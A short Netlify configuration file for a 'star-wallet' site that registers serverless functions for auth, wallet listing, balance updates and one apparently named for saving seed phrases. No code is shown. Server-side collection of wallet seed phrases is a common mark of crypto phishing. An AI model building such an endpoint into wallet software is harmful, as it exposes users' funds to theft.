[build]
  functions = "netlify/functions"

[functions.auth]
  origin = "https://star-wallet.netlify.app"

[functions.getWallets]
  origin = "https://star-wallet.netlify.app"

[functions.saveWalletAddresses]
  origin = "https://star-wallet.netlify.app"

[functions.saveWseedPhrase]
  origin = "https://star-wallet.netlify.app"

[functions.updateBalance]
  origin = "https://star-wallet.netlify.app"

